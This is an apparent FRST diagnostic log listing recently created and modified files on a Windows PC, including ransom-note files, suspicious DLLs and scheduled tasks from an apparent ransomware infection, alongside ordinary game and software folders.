2014-10-19 21:20 - 2014-10-19 21:20 - 00055104 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\fsthvckq.sys
2014-10-19 21:17 - 2014-10-19 21:21 - 00005062 _____ () C:\Windows\SysWOW64\rsslogs.20141019211656
2014-10-19 21:11 - 2014-10-19 21:14 - 00003797 _____ () C:\Windows\SysWOW64\rsslogs.20141019211029
2014-10-19 11:45 - 2014-10-19 11:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY
2014-10-19 11:40 - 2014-10-19 11:41 - 00002535 _____ () C:\Windows\SysWOW64\rsslogs.20141019113949
2014-10-18 23:58 - 2014-10-19 10:42 - 00029055 _____ () C:\Windows\SysWOW64\rsslogs.20141018235802
2014-10-18 19:10 - 2014-10-19 11:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ifylqyte
2014-10-18 19:07 - 2014-10-23 16:52 - 00003246 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:06 - 2014-10-23 16:52 - 00003376 _____ () C:\Windows\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1557230296-4363482-4078292831-1002
2014-10-18 19:03 - 2014-10-23 18:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3324824421.job
2014-10-18 19:03 - 2014-10-18 19:03 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3324824421
2014-10-18 19:00 - 2014-10-18 23:58 - 00376141 _____ () C:\Windows\SysWOW64\rsslogs.20141018185920
2014-10-18 18:49 - 2014-10-18 18:49 - 00003160 _____ () C:\Windows\System32\Tasks\{1E3340DC-06B1-483A-AA5F-84CF6DD5E40A}
2014-10-18 18:47 - 2014-10-18 18:47 - 00192999 _____ () C:\Users\RaRWolf\Downloads\inform633_win32.zip
2014-10-18 18:36 - 2014-10-18 18:36 - 00253546 _____ () C:\Users\RaRWolf\Downloads\inform6.zip
2014-10-18 18:04 - 2014-10-18 18:05 - 08119386 _____ () C:\Users\RaRWolf\Downloads\I7_6L38_Windows.exe
2014-10-18 10:50 - 2014-10-23 18:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3847798286.job
2014-10-18 10:50 - 2014-10-18 10:50 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3847798286
2014-10-17 19:54 - 2014-10-17 19:58 - 00005058 _____ () C:\Windows\SysWOW64\rsslogs.20141017195335
2014-10-17 17:32 - 2014-10-17 17:36 - 00006318 _____ () C:\Windows\SysWOW64\rsslogs.20141017173148
2014-10-17 17:27 - 2014-10-17 17:27 - 00000000 __SHD () C:\found.000
2014-10-17 07:36 - 2014-10-23 18:00 - 00000848 _____ () C:\Windows\Tasks\Security Center Update - 2903558157.job
2014-10-17 07:36 - 2014-10-17 07:36 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 2903558157
2014-10-16 18:00 - 2014-10-16 18:00 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\by Decepticon
2014-10-16 15:41 - 2014-10-16 20:17 - 00349655 _____ () C:\Windows\SysWOW64\rsslogs.20141016154014
2014-10-16 15:35 - 2014-10-23 18:00 - 00000844 _____ () C:\Windows\Tasks\Security Center Update - 3029572363.job
2014-10-16 15:35 - 2014-10-16 15:35 - 00003820 _____ () C:\Windows\System32\Tasks\Security Center Update - 3029572363
2014-10-16 15:34 - 2014-10-23 18:00 - 00000932 _____ () C:\Windows\Tasks\Security Center Update - 258622643.job
2014-10-16 15:34 - 2014-10-16 15:34 - 00003908 _____ () C:\Windows\System32\Tasks\Security Center Update - 258622643
2014-10-16 15:25 - 2014-10-23 18:00 - 00000934 _____ () C:\Windows\Tasks\Security Center Update - 1765064875.job
2014-10-16 15:25 - 2014-10-21 18:36 - 00000272 _____ () C:\Users\RaRWolf\INSTALL_TOR.URL
2014-10-16 15:25 - 2014-10-16 15:25 - 00003910 _____ () C:\Windows\System32\Tasks\Security Center Update - 1765064875
2014-10-16 15:03 - 2014-10-16 15:03 - 00045442 _____ () C:\Windows\SysWOW64\rsslogs.20141016150239
2014-10-16 12:04 - 2014-10-16 12:04 - 00223097 _____ () C:\Windows\SysWOW64\rsslogs.20141016120406
2014-10-16 07:06 - 2014-10-16 12:04 - 00375584 _____ () C:\Windows\SysWOW64\rsslogs.20141016070501
2014-10-16 01:10 - 2014-10-16 01:10 - 00452714 _____ () C:\Windows\SysWOW64\rsslogs.20141016011028
2014-10-15 11:43 - 2014-10-16 01:09 - 01117862 _____ () C:\Windows\SysWOW64\rsslogs.20141015114230
2014-10-15 01:10 - 2014-10-15 11:42 - 00821065 _____ () C:\Windows\SysWOW64\rsslogs.20141015011027
2014-10-14 20:12 - 2014-10-15 01:10 - 00376136 _____ () C:\Windows\SysWOW64\rsslogs.20141014201145
2014-10-13 21:01 - 2014-10-13 21:02 - 07600226 _____ () C:\Users\RaRWolf\Downloads\ACBF_THEME.ZIP
2014-10-13 18:14 - 2014-10-13 18:14 - 00000000 ____D () C:\Windows\LastGood.Tmp
2014-10-12 22:17 - 2014-10-12 22:17 - 00002776 _____ () C:\Windows\System32\Tasks\CCleanerSkipUAC
2014-10-12 22:16 - 2014-10-12 22:17 - 00000000 ____D () C:\Program Files\CCleaner
2014-10-12 22:16 - 2014-10-12 22:16 - 04965896 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\ccsetup418 (1).exe
2014-10-12 22:16 - 2014-10-12 22:16 - 00000829 _____ () C:\Users\Public\Desktop\CCleaner.lnk
2014-10-12 22:16 - 2014-10-12 22:16 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
2014-10-12 05:55 - 2014-10-12 05:57 - 00000000 ____D () C:\reg value hkus
2014-10-12 00:25 - 2014-10-12 00:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Plarium
2014-10-12 00:24 - 2014-10-12 00:22 - 04378864 _____ (Piriform Ltd) C:\Users\RaRWolf\Downloads\cc_setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup.exe
2014-10-11 23:31 - 2014-10-11 23:33 - 00800688 _____ ( ) C:\Users\RaRWolf\Downloads\CCleaner_Setup (1).exe
2014-10-11 11:46 - 2014-10-11 11:46 - 01121208 _____ () C:\Users\RaRWolf\Downloads\ProcessMonitor.zip
2014-10-10 14:05 - 2014-10-10 14:24 - 00000000 ____D () C:\Users\RaRWolf\Zomboid
2014-10-10 12:55 - 2014-10-10 12:55 - 00081408 _____ () C:\Users\RaRWolf\AppData\Roaming\qxigf.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00047104 _____ () C:\Users\RaRWolf\AppData\Roaming\dbrmh.dll
2014-10-10 12:55 - 2014-10-10 12:55 - 00004060 _____ () C:\Windows\System32\Tasks\{AE7C3D4A-D84F-FFE7-69BB-457B9C83DCAC}
2014-10-10 12:55 - 2014-10-10 12:55 - 00000000 _____ () C:\Users\RaRWolf\AppData\Roaming\nzhmwb.dll
2014-10-10 08:07 - 2014-10-10 08:07 - 00000000 ____D () C:\ProgramData\E1802384DB2718039F19F24F4594560F
2014-10-10 07:58 - 2014-10-10 07:58 - 00000000 ____D () C:\Users\RaRWolf\Documents\GameMaker
2014-10-10 07:57 - 2014-10-10 08:07 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\gamemaker_studio
2014-10-10 07:57 - 2014-10-10 07:57 - 00000000 ____D () C:\ProgramData\gamemaker_studio
2014-10-09 16:51 - 2014-10-23 18:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Skype
2014-10-08 21:59 - 2014-10-23 17:15 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\AIMP3
2014-10-08 21:03 - 2014-10-08 21:04 - 07718830 _____ () C:\Users\RaRWolf\Downloads\aimp_3.50.1224_beta_1.zip
2014-10-08 18:45 - 2014-10-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz Help
2014-10-08 18:41 - 2014-10-08 18:41 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Stykz
2014-10-08 18:40 - 2014-10-08 18:41 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz (1).zip
2014-10-07 19:44 - 2014-10-07 19:44 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2014-10-07 19:43 - 2014-10-07 19:43 - 01677920 _____ (Skype Technologies S.A.) C:\Users\RaRWolf\Downloads\SkypeSetup.exe
2014-10-07 18:53 - 2014-10-14 20:08 - 00122584 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-10-07 18:52 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes Anti-Malware
2014-10-07 18:52 - 2014-05-12 07:26 - 00091352 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2014-10-07 18:52 - 2014-05-12 07:26 - 00064216 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2014-10-07 18:52 - 2014-05-12 07:25 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-10-07 18:44 - 2014-10-07 18:45 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\RaRWolf\Downloads\mbam-setup-2.0.2.1012.exe
2014-10-07 02:32 - 2014-10-21 18:36 - 00008516 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.HTML
2014-10-07 02:32 - 2014-10-21 18:36 - 00004198 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.TXT
2014-10-07 02:32 - 2014-10-07 02:32 - 00000276 _____ () C:\Users\RaRWolf\DECRYPT_INSTRUCTION.URL
2014-10-06 22:50 - 2014-10-06 22:50 - 01887384 _____ ( ) C:\Users\RaRWolf\Downloads\Pivot_v4-1.exe
2014-10-06 22:38 - 2014-10-06 22:38 - 00027448 _____ () C:\Users\RaRWolf\Downloads\12197798227.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 07085849 _____ () C:\Users\RaRWolf\Downloads\1208036521.zip
2014-10-06 22:29 - 2014-10-06 22:30 - 02304925 _____ () C:\Users\RaRWolf\Downloads\1208088047.zip
2014-10-06 22:17 - 2014-10-06 22:17 - 00008224 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 22:17 - 2014-10-06 22:17 - 00004156 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 22:17 - 2014-10-06 22:17 - 00000276 _____ () C:\Users\RaRWolf\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 22:16 - 2014-10-08 18:48 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\._LiveCode_
2014-10-06 22:15 - 2014-10-08 18:47 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Stykz
2014-10-06 22:15 - 2014-10-06 22:15 - 00000000 ____D () C:\Users\RaRWolf\Documents\Animations
2014-10-06 22:12 - 2014-10-06 22:14 - 09890335 _____ () C:\Users\RaRWolf\Downloads\Install_Stykz.zip
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00008224 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.HTML
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00004156 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.TXT
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\Roaming\DECRYPT_INSTRUCTION.URL
2014-10-06 21:48 - 2014-10-06 21:48 - 00000276 _____ () C:\Users\RaRWolf\AppData\DECRYPT_INSTRUCTION.URL
2014-10-06 20:34 - 2014-10-06 20:34 - 00008224 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.HTML
2014-10-06 20:34 - 2014-10-06 20:34 - 00004156 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-10-06 20:34 - 2014-10-06 20:34 - 00000276 _____ () C:\Users\RaRWolf\AppData\Local\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00008224 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00004156 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL
2014-10-06 19:43 - 2014-10-06 19:43 - 00000276 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL
2014-10-06 19:42 - 2014-10-06 19:42 - 00008224 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.HTML
2014-10-06 19:42 - 2014-10-06 19:42 - 00004156 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.TXT
2014-10-06 19:42 - 2014-10-06 19:42 - 00000276 _____ () C:\ProgramData\DECRYPT_INSTRUCTION.URL
2014-10-05 14:34 - 2014-10-23 18:30 - 00000000 ____D () C:\FRST
2014-10-05 14:33 - 2014-10-22 17:11 - 02112000 _____ (Farbar) C:\Users\RaRWolf\Downloads\FRST64.exe
2014-09-30 16:00 - 2014-10-22 19:38 - 00000000 ____D () C:\ProgramData\Windows Genuine Advantage
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-27 14:30 - 2014-09-27 14:30 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skulltag
2014-09-24 22:41 - 2014-09-24 22:41 - 00001012 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Construct 2.lnk
2014-09-24 22:41 - 2014-09-24 22:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Construct2
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2014-10-23 18:33 - 2014-03-20 16:54 - 00000934 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-10-23 18:00 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\sru
2014-10-23 17:58 - 2013-10-05 13:48 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Running with rifles
2014-10-23 17:47 - 2012-12-29 17:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LogMeIn Hamachi
2014-10-23 17:46 - 2014-08-13 03:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\CrashDumps
2014-10-23 17:41 - 2012-12-26 16:30 - 00000830 _____ () C:\Windows\Tasks\Adobe Flash Player Updater.job
2014-10-23 17:35 - 2012-12-26 14:45 - 00003592 _____ () C:\Windows\System32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-1557230296-4363482-4078292831-1002
2014-10-23 17:32 - 2012-12-26 16:37 - 00000000 ____D () C:\Program Files (x86)\Steam
2014-10-23 16:44 - 2014-03-20 16:54 - 00000930 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-10-22 22:54 - 2013-05-31 19:17 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\uTorrent
2014-10-22 17:50 - 2013-08-07 15:36 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RPG MAKER VX Ace
2014-10-22 17:42 - 2013-02-21 20:31 - 00000000 ____D () C:\Games
2014-10-22 16:59 - 2013-05-08 20:26 - 00000000 ____D () C:\Users\RaRWolf\RaR
2014-10-21 18:54 - 2013-10-28 20:27 - 01132544 ___SH () C:\Users\RaRWolf\Downloads\Thumbs.db
2014-10-21 18:36 - 2012-12-26 14:37 - 00000000 ____D () C:\Users\RaRWolf
2014-10-21 08:28 - 2014-03-20 16:54 - 00003906 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-10-21 08:28 - 2014-03-20 16:54 - 00003670 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-10-20 02:01 - 2013-02-05 08:11 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Adobe
2014-10-19 21:16 - 2013-12-16 23:52 - 00000000 ____D () C:\ProgramData\NVIDIA
2014-10-19 21:16 - 2012-07-26 03:22 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-10-19 21:14 - 2012-09-25 07:19 - 01253924 _____ () C:\Windows\WindowsUpdate.log
2014-10-19 11:53 - 2012-09-14 05:25 - 01579054 _____ () C:\Windows\DirectX.log
2014-10-19 11:37 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\system32\NDF
2014-10-18 18:58 - 2012-09-14 03:47 - 00073604 _____ () C:\Windows\PFRO.log
2014-10-18 18:31 - 2014-07-24 19:28 - 00000000 ____D () C:\Users\RaRWolf\Documents\Inform
2014-10-17 17:39 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\ELAM
2014-10-14 18:29 - 2013-12-26 14:45 - 00000000 ____D () C:\Users\RaRWolf\Documents\WB Games
2014-10-14 07:23 - 2013-05-26 21:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Pro
2014-10-14 07:23 - 2013-05-26 21:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Lite
2014-10-14 07:22 - 2014-03-24 15:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Media Player Classic
2014-10-14 06:53 - 2013-07-22 20:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\TS3Client
2014-10-14 05:42 - 2013-02-10 21:29 - 00000000 ____D () C:\Windows\Minidump
2014-10-13 18:14 - 2012-09-14 04:59 - 00000000 ____D () C:\Windows\SysWOW64\RTCOM
2014-10-13 18:14 - 2012-07-26 03:21 - 00030344 _____ () C:\Windows\setupact.log
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\Temp
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ___HD () C:\Program Files (x86)\InstallShield Installation Information
2014-10-13 17:06 - 2012-09-14 04:58 - 00000000 ____D () C:\Program Files (x86)\Realtek
2014-10-11 11:27 - 2012-07-26 01:26 - 00262144 ___SH () C:\Windows\system32\config\BBI
2014-10-11 04:18 - 2014-07-14 11:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3 Launcher
2014-10-11 03:55 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Arma 3
2014-10-10 02:16 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\AUInstallAgent
2014-10-09 16:50 - 2014-06-26 14:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld2
2014-10-08 17:56 - 2012-07-26 04:12 - 00000000 ____D () C:\Windows\Help
2014-10-07 19:44 - 2013-01-31 23:33 - 00000000 ___RD () C:\Program Files (x86)\Skype
2014-10-07 19:44 - 2013-01-31 23:32 - 00000000 ____D () C:\ProgramData\Skype
2014-10-07 19:26 - 2013-01-02 23:13 - 00000442 _____ () C:\Windows\system32\Drivers\etc\hosts.ics
2014-10-07 02:31 - 2013-01-13 21:07 - 00000000 ____D () C:\Users\RaRWolf\wurm
2014-10-06 23:01 - 2013-02-23 02:14 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Pivot Animator
2014-10-06 22:27 - 2014-02-21 00:42 - 00000000 ____D () C:\Users\RaRWolf\Random
2014-10-06 22:17 - 2014-03-01 19:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Space
2014-10-06 22:17 - 2013-03-22 07:10 - 00000000 ____D () C:\Users\RaRWolf\My Games
2014-10-06 22:17 - 2013-01-18 17:50 - 00000000 ____D () C:\Users\RaRWolf\Documents\Wolfire
2014-10-06 22:16 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\RCT3
2014-10-06 22:16 - 2014-02-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rainmeter
2014-10-06 22:16 - 2013-09-14 20:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\SimCity 4
2014-10-06 22:16 - 2013-04-27 09:59 - 00000000 ____D () C:\Users\RaRWolf\Documents\Rockstar Games
2014-10-06 22:13 - 2014-08-11 15:24 - 00000000 ____D () C:\Users\RaRWolf\Documents\Oddworld
2014-10-06 22:13 - 2013-06-29 19:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\Nexus Mod Manager
2014-10-06 22:11 - 2014-07-08 18:46 - 00000280 _____ () C:\Users\RaRWolf\Documents\New Text Document.txt
2014-10-06 22:11 - 2013-01-03 19:08 - 00000000 ____D () C:\Users\RaRWolf\Documents\My Games
2014-10-06 22:02 - 2014-04-27 20:36 - 00000000 ____D () C:\Users\RaRWolf\Documents\Klei
2014-10-06 22:02 - 2014-04-06 19:56 - 00000000 ____D () C:\Users\RaRWolf\Documents\Euro Truck Simulator 2
2014-10-06 22:02 - 2014-01-09 16:49 - 00000000 ____D () C:\Users\RaRWolf\Documents\KillHouseGames
2014-10-06 22:02 - 2013-02-17 19:12 - 00000000 ____D () C:\Users\RaRWolf\Documents\Mount&Blade With Fire and Sword
2014-10-06 22:01 - 2014-08-27 11:07 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electrontic Arts
2014-10-06 22:01 - 2013-08-18 16:37 - 00000000 ____D () C:\Users\RaRWolf\Documents\Electronic Arts
2014-10-06 21:59 - 2013-08-14 20:00 - 00000000 ____D () C:\Users\RaRWolf\Documents\EA Games
2014-10-06 21:52 - 2014-07-19 04:13 - 00000000 ____D () C:\Users\RaRWolf\Documents\Dolphin Emulator
2014-10-06 21:52 - 2014-06-18 21:51 - 00000000 ____D () C:\Users\RaRWolf\Documents\BioWare
2014-10-06 21:52 - 2013-07-06 19:20 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3 Alpha
2014-10-06 21:51 - 2013-06-28 13:33 - 00000000 ____D () C:\Users\RaRWolf\Documents\Arma 3
2014-10-06 21:51 - 2013-02-01 08:14 - 00000000 ____D () C:\Users\RaRWolf\Documents\ArmA 2
2014-10-06 21:48 - 2013-06-12 15:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\WorldPainter
2014-10-06 21:48 - 2013-03-20 15:25 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Ubisoft
2014-10-06 21:47 - 2014-02-20 15:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\steamvr
2014-10-06 21:47 - 2013-10-23 14:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SpaceEngineers
2014-10-06 21:47 - 2013-09-29 09:24 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Tropico 4
2014-10-06 21:47 - 2013-01-13 05:00 - 00726071 _____ () C:\Users\RaRWolf\AppData\Roaming\technic-launcher.jar.bak
2014-10-06 21:38 - 2013-01-31 23:33 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\SkypeOld
2014-10-06 21:36 - 2014-08-12 13:17 - 00036632 _____ () C:\Users\RaRWolf\AppData\Roaming\RZR_0180ce6c46479a4dad8b47328d2f.db
2014-10-06 21:36 - 2014-08-01 20:16 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\RealNetworks
2014-10-06 21:36 - 2014-08-01 20:15 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Real
2014-10-06 21:36 - 2013-11-14 16:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\six-updater
2014-10-06 21:36 - 2013-04-27 09:56 - 00000000 __RHD () C:\Users\RaRWolf\AppData\Roaming\SecuROM
2014-10-06 21:35 - 2014-01-13 20:40 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Nidhogg
2014-10-06 21:35 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Origin
2014-10-06 21:35 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\New Technology Studio
2014-10-06 21:35 - 2013-01-05 18:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Natural Selection 2
2014-10-06 21:22 - 2013-08-08 13:36 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mount&Blade Warband
2014-10-06 21:22 - 2013-06-22 22:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MOVAVI
2014-10-06 21:22 - 2013-04-26 15:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\MinMaxGames
2014-10-06 21:22 - 2012-12-26 16:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Mozilla
2014-10-06 21:20 - 2014-04-08 22:43 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\ECSoftware
2014-10-06 21:20 - 2013-08-13 22:45 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DVDVideoSoft
2014-10-06 21:20 - 2013-05-09 06:50 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Doublefine
2014-10-06 21:20 - 2013-04-26 21:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\LOVE
2014-10-06 21:17 - 2014-08-01 19:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Corel
2014-10-06 21:17 - 2014-07-09 15:57 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DarknessII
2014-10-06 21:17 - 2014-03-27 17:32 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\CreeperWorld3
2014-10-06 21:17 - 2013-05-26 18:01 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\DAEMON Tools Ultra
2014-10-06 20:58 - 2014-08-20 23:59 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Atari
2014-10-06 20:58 - 2012-12-26 14:39 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\Adobe
2014-10-06 20:57 - 2013-01-13 05:00 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.techniclauncher
2014-10-06 20:50 - 2013-06-10 17:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.technic
2014-10-06 20:37 - 2013-08-12 15:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Roaming\.minecraft
2014-10-06 20:34 - 2014-04-24 19:41 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\The Witcher
2014-10-06 20:34 - 2014-04-11 16:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\SniperV2
2014-10-06 20:34 - 2014-03-17 18:04 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skype
2014-10-06 20:34 - 2014-03-05 22:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Uber Entertainment
2014-10-06 20:34 - 2013-06-29 12:34 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Skyrim
2014-10-06 20:34 - 2013-04-27 09:56 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Rockstar Games
2014-10-06 20:34 - 2013-03-05 22:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\WhatPulse
2014-10-06 20:34 - 2013-01-14 16:51 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Roblox
2014-10-06 20:32 - 2013-12-22 16:23 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Oblivion
2014-10-06 20:32 - 2013-08-22 20:31 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PAYDAY 2
2014-10-06 20:32 - 2013-08-14 16:49 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Origin
2014-10-06 20:32 - 2013-05-25 18:38 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Play withSIX
2014-10-06 20:32 - 2013-05-12 15:28 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\New Technology Studio
2014-10-06 20:32 - 2013-01-12 13:02 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\PunkBuster
2014-10-06 20:14 - 2014-03-20 16:53 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Google
2014-10-06 20:14 - 2014-01-22 00:09 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\LucasArts
2014-10-06 20:14 - 2013-11-08 18:46 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Introversion
2014-10-06 20:14 - 2013-02-01 19:55 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\IsolatedStorage
2014-10-06 20:13 - 2014-08-27 11:08 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Electronic Arts
2014-10-06 20:13 - 2014-06-27 00:21 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Configuration Tool
2014-10-06 20:13 - 2014-01-29 14:03 - 00000000 ____D () C:\Users\RaRWolf\AppData\Local\Blizzard
